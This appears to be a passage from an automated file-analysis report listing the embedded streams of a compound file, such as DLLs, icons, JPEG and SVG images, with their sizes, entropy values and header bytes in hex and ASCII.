                                  Data Raw:4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00
                                  General
                                  Stream Path:\x17163\x16689\x18229\x16190\x17010\x18103\x17764\x15208\x17896\x16808\x17591\x18357\x17383\x18479
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Stream Size:895968
                                  Entropy:6.44996656139
                                  Base64 Encoded:True
                                  Data ASCII:M Z . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . L . ! T h i s p r o g r a m c a n n o t b e r u n i n D O S m o d e . . . . $ . . . . . . . X . Z . . . 4 P . . 4 P . . 4 P . . 7 Q . . 4 P . . 1 Q . . 4 P N . 0 Q . . 4 P N . 7 Q . . 4 P N . 1 Q N . 4 P . . 0 Q . . 4 P . . 5 Q . . 4 P . . 5 P 1 . 4 P . . = Q , . 4 P . . 4 Q . . 4 P . . . P . . 4 P . . . P . . 4 P . . 6 Q . . 4 P R i c h . . 4 P
                                  Data Raw:4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00
                                  General
                                  Stream Path:\x17163\x16689\x18229\x16190\x17579\x17909\x17958\x15351\x16687\x17834\x16894\x17391
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Stream Size:288224
                                  Entropy:6.58114708933
                                  Base64 Encoded:True
                                  Data ASCII:M Z . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . L . ! T h i s p r o g r a m c a n n o t b e r u n i n D O S m o d e . . . . $ . . . . . . . . u S D A . . D A . . D A . . . 3 . . I A . . . 3 . . . A . . . 4 . . U A . . . 4 . . R A . . . 4 . . . A . . . 3 . . ] A . . . 3 . . E A . . . 3 . . U A . . D A . . . A . . . 4 . . _ A . . . 4 . . E A . . . 4 . . E A . . D A . . E A . . . 4 . . E A . .
                                  Data Raw:4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00
                                  General
                                  Stream Path:\x17163\x16689\x18229\x16318\x18483
                                  File Type:MS Windows icon resource - 1 icon, 16x16, 16 colors
                                  Stream Size:318
                                  Entropy:2.03693614652
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . ( . . . . . . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                  Data Raw:00 00 01 00 01 00 10 10 10 00 00 00 00 00 28 01 00 00 16 00 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 04 00 00 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 c0 c0 c0 00 80 80 80 00 00 00 ff 00 00 ff 00 00 00 ff ff 00 ff 00 00 00 ff 00 ff 00 ff ff 00 00 ff ff ff 00 00 00
                                  General
                                  Stream Path:\x17163\x16689\x18229\x16702\x16812\x17848\x16695\x17894\x16894\x17391
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Stream Size:408544
                                  Entropy:6.41059821146
                                  Base64 Encoded:True
                                  Data ASCII:M Z . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . L . ! T h i s p r o g r a m c a n n o t b e r u n i n D O S m o d e . . . . $ . . . . . . . . . . 0 . . . c . . . c . . . c " . . b . . . c " . . b V . . c . . . b . . . c . . . b . . . c . . . b . . . c " . . b . . . c " . . b . . . c " . . b . . . c . . . c . . . c H . . b . . . c H . . b . . . c H . S c . . . c . . ; c . . . c H . . b . . . c
                                  Data Raw:4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00
                                  General
                                  Stream Path:\x17163\x16689\x18229\x16766\x17508\x16945\x18357\x16822\x17380\x14440\x14341\x17278\x17075
                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 938x111, frames 3
                                  Stream Size:9319
                                  Entropy:7.35217207818
                                  Base64 Encoded:True
                                  Data ASCII:. . . . . . J F I F . . . . . . . . . . . . . . D u c k y . . . . . . . < . . . . . } h t t p : / / n s . a d o b e . c o m / x a p / 1 . 0 / . < ? x p a c k e t b e g i n = " . . . " i d = " W 5 M 0 M p C e h i H z r e S z N T c z k c 9 d " ? > < x : x m p m e t a x m l n s : x = " a d o b e : n s : m e t a / " x : x m p t k = " A d o b e X M P C o r e 6 . 0 - c 0 0 6 7 9 . d a b a c b b , 2 0 2 1 / 0 4 / 1 4 - 0 0 : 3 9 : 4 4 " > < r d f : R D F x m l n s : r d f =
                                  Data Raw:ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 3c 00 00 ff e1 03 7d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78
                                  General
                                  Stream Path:\x17163\x16689\x18229\x16766\x17508\x16945\x18357\x16822\x17380\x14440\x14658\x17278\x17075
                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 625x74, frames 3
                                  Stream Size:5714
                                  Entropy:7.42751568247
                                  Base64 Encoded:True
                                  Data ASCII:. . . . . . J F I F . . . . . . . . . . . . . . D u c k y . . . . . . . < . . . . . } h t t p : / / n s . a d o b e . c o m / x a p / 1 . 0 / . < ? x p a c k e t b e g i n = " . . . " i d = " W 5 M 0 M p C e h i H z r e S z N T c z k c 9 d " ? > < x : x m p m e t a x m l n s : x = " a d o b e : n s : m e t a / " x : x m p t k = " A d o b e X M P C o r e 6 . 0 - c 0 0 6 7 9 . d a b a c b b , 2 0 2 1 / 0 4 / 1 4 - 0 0 : 3 9 : 4 4 " > < r d f : R D F x m l n s : r d f =
                                  Data Raw:ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 3c 00 00 ff e1 03 7d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78
                                  General
                                  Stream Path:\x17163\x16689\x18229\x16766\x17508\x16945\x18357\x16822\x17380\x14504\x14336\x17278\x17075
                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1875x222, frames 3
                                  Stream Size:22946
                                  Entropy:6.9205041088
                                  Base64 Encoded:True
                                  Data ASCII:. . . . . . J F I F . . . . . . . . . . . . . . D u c k y . . . . . . . < . . . . . } h t t p : / / n s . a d o b e . c o m / x a p / 1 . 0 / . < ? x p a c k e t b e g i n = " . . . " i d = " W 5 M 0 M p C e h i H z r e S z N T c z k c 9 d " ? > < x : x m p m e t a x m l n s : x = " a d o b e : n s : m e t a / " x : x m p t k = " A d o b e X M P C o r e 6 . 0 - c 0 0 6 7 9 . d a b a c b b , 2 0 2 1 / 0 4 / 1 4 - 0 0 : 3 9 : 4 4 " > < r d f : R D F x m l n s : r d f =
                                  Data Raw:ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 3c 00 00 ff e1 03 7d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78
                                  General
                                  Stream Path:\x17163\x16689\x18229\x16766\x17508\x16945\x18357\x17645\x18474
                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 500x59, frames 3
                                  Stream Size:4502
                                  Entropy:7.59347638402
                                  Base64 Encoded:True
                                  Data ASCII:. . . . . . J F I F . . . . . . . . . . . . . . D u c k y . . . . . . . < . . . . . } h t t p : / / n s . a d o b e . c o m / x a p / 1 . 0 / . < ? x p a c k e t b e g i n = " . . . " i d = " W 5 M 0 M p C e h i H z r e S z N T c z k c 9 d " ? > < x : x m p m e t a x m l n s : x = " a d o b e : n s : m e t a / " x : x m p t k = " A d o b e X M P C o r e 6 . 0 - c 0 0 6 7 9 . d a b a c b b , 2 0 2 1 / 0 4 / 1 4 - 0 0 : 3 9 : 4 4 " > < r d f : R D F x m l n s : r d f =
                                  Data Raw:ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 3c 00 00 ff e1 03 7d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78
                                  General
                                  Stream Path:\x17163\x16689\x18229\x16766\x17508\x16945\x18357\x18038\x18474
                                  File Type:SVG Scalable Vector Graphics image
                                  Stream Size:28870
                                  Entropy:4.29697375738
                                  Base64 Encoded:True
                                  Data ASCII:< ? x m l v e r s i o n = " 1 . 0 " e n c o d i n g = " u t f - 8 " ? > . . < ! - - G e n e r a t o r : A d o b e I l l u s t r a t o r 2 5 . 2 . 3 , S V G E x p o r t P l u g - I n . S V G V e r s i o n : 6 . 0 0 B u i l d 0 ) - - > . . < s v g v e r s i o n = " 1 . 1 " i d = " L a y e r _ 8 " x m l n s = " h t t p : / / w w w . w 3 . o r g / 2 0 0 0 / s v g " x m l n s : x l i n k = " h t t p : / / w w w . w 3 . o r g / 1 9 9 9 / x l i n k " x = " 0 p x " y =
                                  Data Raw:3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 21 2d 2d 20 47 65 6e 65 72 61 74 6f 72 3a 20 41 64 6f 62 65 20 49 6c 6c 75 73 74 72 61 74 6f 72 20 32 35 2e 32 2e 33 2c 20 53 56 47 20 45 78 70 6f 72 74 20 50 6c 75 67 2d 49 6e 20 2e 20 53 56 47 20 56 65 72 73 69 6f 6e 3a 20 36 2e 30 30 20 42 75 69 6c 64 20 30
                                  General
                                  Stream Path:\x17163\x16689\x18229\x16830\x16880\x17199\x17329\x17764\x17589\x18490
                                  File Type:MS Windows icon resource - 3 icons, 16x16, 16 colors, 4 bits/pixel, 16x16, 8 bits/pixel
                                  Stream Size:2862
                                  Entropy:3.16043065194
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . ( . . . 6 . . . . . . . . . . . h . . . ^ . . . . . . . . . . h . . . . . . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w v . . . . . " " " " " o . . " " " " " o . . w w w " " . . . . . . " / . . . .
                                  Data Raw:00 00 01 00 03 00 10 10 10 00 00 00 04 00 28 01 00 00 36 00 00 00 10 10 00 00 00 00 08 00 68 05 00 00 5e 01 00 00 10 10 00 00 00 00 20 00 68 04 00 00 c6 06 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 04 00 00 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 80 80 80 00 c0 c0
                                  General
                                  Stream Path:\x17163\x16689\x18229\x16830\x17458\x17395\x17896\x18476
                                  File Type:MS Windows icon resource - 2 icons, 32x32, 16 colors, 32x32
                                  Stream Size:2998
                                  Entropy:4.35906224297
                                  Base64 Encoded:True
                                  Data ASCII:. . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . ( . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w . . . . . . . . . . . . . . . . { . . . . . . . . . . . . . . . . . . p . . . . . . . . . . x . { . w p . . . . . . . . . . . . { . w . . . . . . . .
                                  Data Raw:00 00 01 00 02 00 20 20 10 00 00 00 00 00 e8 02 00 00 26 00 00 00 20 20 00 00 00 00 00 00 a8 08 00 00 0e 03 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 c0 c0 c0 00 80 80 80 00 00 00 ff 00 00 ff 00 00 00 ff ff 00 ff 00
                                  General
                                  Stream Path:\x17163\x16689\x18229\x16830\x17848\x17207\x17574\x18481
                                  File Type:MS Windows icon resource - 2 icons, 32x32, 16 colors, 32x32
                                  Stream Size:2998
                                  Entropy:4.29856879699
                                  Base64 Encoded:True
                                  Data ASCII:. . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . ( . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w . . . . . . . . . . . . . . . . { . . . . . . . . . . . . . . . . . . p . . . . . . . . . . x . { . w p . . . . . . . . . . . . { . w . . . . . . . .
                                  Data Raw:00 00 01 00 02 00 20 20 10 00 00 00 00 00 e8 02 00 00 26 00 00 00 20 20 00 00 00 00 00 00 a8 08 00 00 0e 03 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 c0 c0 c0 00 80 80 80 00 00 00 ff 00 00 ff 00 00 00 ff ff 00 ff 00
                                  General
                                  Stream Path:\x17163\x16689\x18229\x16894\x16684\x17583\x18346\x16822\x17380\x14440\x14341\x17278\x17075
                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 938x593, frames 3
                                  Stream Size:27770
                                  Entropy:7.06368048149
                                  Base64 Encoded:True
                                  Data ASCII:. . . . . . J F I F . . . . . . . . . . . . . . D u c k y . . . . . . . < . . . . . } h t t p : / / n s . a d o b e . c o m / x a p / 1 . 0 / . < ? x p a c k e t b e g i n = " . . . " i d = " W 5 M 0 M p C e h i H z r e S z N T c z k c 9 d " ? > < x : x m p m e t a x m l n s : x = " a d o b e : n s : m e t a / " x : x m p t k = " A d o b e X M P C o r e 6 . 0 - c 0 0 6 7 9 . d a b a c b b , 2 0 2 1 / 0 4 / 1 4 - 0 0 : 3 9 : 4 4 " > < r d f : R D F x m l n s : r d f =
                                  Data Raw:ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 3c 00 00 ff e1 03 7d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78
                                  General
                                  Stream Path:\x17163\x16689\x18229\x16894\x16684\x17583\x18346\x16822\x17380\x14440\x14658\x17278\x17075
                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 625x395, frames 3
                                  Stream Size:16673
                                  Entropy:7.30816983161
                                  Base64 Encoded:True
                                  Data ASCII:. . . . . . J F I F . . . . . . . . . . . . . . D u c k y . . . . . . . < . . . . . } h t t p : / / n s . a d o b e . c o m / x a p / 1 . 0 / . < ? x p a c k e t b e g i n = " . . . " i d = " W 5 M 0 M p C e h i H z r e S z N T c z k c 9 d " ? > < x : x m p m e t a x m l n s : x = " a d o b e : n s : m e t a / " x : x m p t k = " A d o b e X M P C o r e 6 . 0 - c 0 0 6 7 9 . d a b a c b b , 2 0 2 1 / 0 4 / 1 4 - 0 0 : 3 9 : 4 4 " > < r d f : R D F x m l n s : r d f =
                                  Data Raw:ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 3c 00 00 ff e1 03 7d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78
                                  General
                                  Stream Path:\x17163\x16689\x18229\x16894\x16684\x17583\x18346\x16822\x17380\x14504\x14336\x17278\x17075
                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1875x1185, frames 3
                                  Stream Size:69692
                                  Entropy:6.08285538491
                                  Base64 Encoded:True
                                  Data ASCII:. . . . . . J F I F . . . . . . . . . . . . . . D u c k y . . . . . . . < . . . . . } h t t p : / / n s . a d o b e . c o m / x a p / 1 . 0 / . < ? x p a c k e t b e g i n = " . . . " i d = " W 5 M 0 M p C e h i H z r e S z N T c z k c 9 d " ? > < x : x m p m e t a x m l n s : x = " a d o b e : n s : m e t a / " x : x m p t k = " A d o b e X M P C o r e 6 . 0 - c 0 0 6 7 9 . d a b a c b b , 2 0 2 1 / 0 4 / 1 4 - 0 0 : 3 9 : 4 4 " > < r d f : R D F x m l n s : r d f =
                                  Data Raw:ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 3c 00 00 ff e1 03 7d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78
                                  General
                                  Stream Path:\x17163\x16689\x18229\x16894\x16684\x17583\x18346\x17645\x18474
                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 500x316, frames 3
                                  Stream Size:12626
                                  Entropy:7.45034483136
                                  Base64 Encoded:True
                                  Data ASCII:. . . . . . J F I F . . . . . . . . . . . . . . D u c k y . . . . . . . < . . . . . } h t t p : / / n s . a d o b e . c o m / x a p / 1 . 0 / . < ? x p a c k e t b e g i n = " . . . " i d = " W 5 M 0 M p C e h i H z r e S z N T c z k c 9 d " ? > < x : x m p m e t a x m l n s : x = " a d o b e : n s : m e t a / " x : x m p t k = " A d o b e X M P C o r e 6 . 0 - c 0 0 6 7 9 . d a b a c b b , 2 0 2 1 / 0 4 / 1 4 - 0 0 : 3 9 : 4 4 " > < r d f : R D F x m l n s : r d f =
                                  Data Raw:ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 3c 00 00 ff e1 03 7d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78
                                  General
                                  Stream Path:\x17163\x16689\x18229\x16894\x16684\x17583\x18346\x18038\x18474
                                  File Type:SVG Scalable Vector Graphics image
                                  Stream Size:33179
                                  Entropy:4.25625006704
                                  Base64 Encoded:True
                                  Data ASCII:< ? x m l v e r s i o n = " 1 . 0 " e n c o d i n g = " u t f - 8 " ? > . . < ! - - G e n e r a t o r : A d o b e I l l u s t r a t o r 2 5 . 2 . 3 , S V G E x p o r t P l u g - I n . S V G V e r s i o n : 6 . 0 0 B u i l d 0 ) - - > . . < s v g v e r s i o n = " 1 . 1 " i d = " M o n o _ 1 _ " x m l n s = " h t t p : / / w w w . w 3 . o r g / 2 0 0 0 / s v g " x m l n s : x l i n k = " h t t p : / / w w w . w 3 . o r g / 1 9 9 9 / x l i n k " x = " 0 p x " y =
                                  Data Raw:3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 21 2d 2d 20 47 65 6e 65 72 61 74 6f 72 3a 20 41 64 6f 62 65 20 49 6c 6c 75 73 74 72 61 74 6f 72 20 32 35 2e 32 2e 33 2c 20 53 56 47 20 45 78 70 6f 72 74 20 50 6c 75 67 2d 49 6e 20 2e 20 53 56 47 20 56 65 72 73 69 6f 6e 3a 20 36 2e 30 30 20 42 75 69 6c 64 20 30
                                  General
                                  Stream Path:\x17163\x16689\x18229\x16958\x16827\x16687\x17200\x18470
                                  File Type:MS Windows icon resource - 1 icon, 32x32, 16 colors
                                  Stream Size:766
                                  Entropy:3.3484862649
                                  Base64 Encoded:True
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . ( . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 3 1 . . . . . . . . . . . . 3 3 2 3 3 3 3 3 3 3 3 3 3 3 3 . 3 3 $ D D D D D D D D D D D @ 1 . 2 D D D D D D D D D D D D D . . 2 D D D D D D @ D D D D D D C . 2 D D D D D D 3 4 D D D D D C . 2 D D D D D @ 3 0 D D D D D . . 3 $ D D D D D 3 4 D D D D D 1 . 3 $
                                  Data Raw:00 00 01 00 01 00 20 20 10 00 00 00 00 00 e8 02 00 00 16 00 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 c0 c0 00 80 80 80 00 00 80 80 00 00 00 00 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 33 33
                                  General
                                  Stream Path:\x17163\x16689\x18229\x17214\x17009\x18482
                                  File Type:MS Windows icon resource - 2 icons, 32x32, 16 colors, 16x16, 16 colors
                                  Stream Size:1078
                                  Entropy:2.86422695486
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . & . . . . . . . . . . . ( . . . . . . . ( . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . w p . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . p . . . . . . . . . . w w . . . w w . . . . . .
                                  Data Raw:00 00 01 00 02 00 20 20 10 00 00 00 00 00 e8 02 00 00 26 00 00 00 10 10 10 00 00 00 00 00 28 01 00 00 0e 03 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 80 80 80 00 c0 c0 c0 00 00 00 ff 00 00 ff 00 00 00 ff ff 00 ff 00
                                  General
                                  Stream Path:\x17163\x16689\x18229\x17214\x17841\x17207\x17574\x18481
                                  File Type:MS Windows icon resource - 2 icons, 32x32, 16 colors, 32x32
                                  Stream Size:2998
                                  Entropy:4.40653521205
                                  Base64 Encoded:True
                                  Data ASCII:. . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . ( . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . { . . . . . . . . . . . . . . . w . . . . . . . . . . p . . x . . . . w . . . . . . . . x . . . w . . w . . . . . . . p . . x x . . w ~ . . . . . . . . x . . . . . ~ . . . . . . .
                                  Data Raw:00 00 01 00 02 00 20 20 10 00 00 00 00 00 e8 02 00 00 26 00 00 00 20 20 00 00 00 00 00 00 a8 08 00 00 0e 03 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 c0 c0 c0 00 80 80 80 00 00 00 ff 00 00 ff 00 00 00 ff ff 00 ff 00
                                  General
                                  Stream Path:\x17163\x16689\x18229\x17790\x17448\x18034\x16812\x18482
                                  File Type:MS Windows icon resource - 2 icons, 32x32, 16 colors, 32x32
                                  Stream Size:2998
                                  Entropy:4.92283562852
                                  Base64 Encoded:False
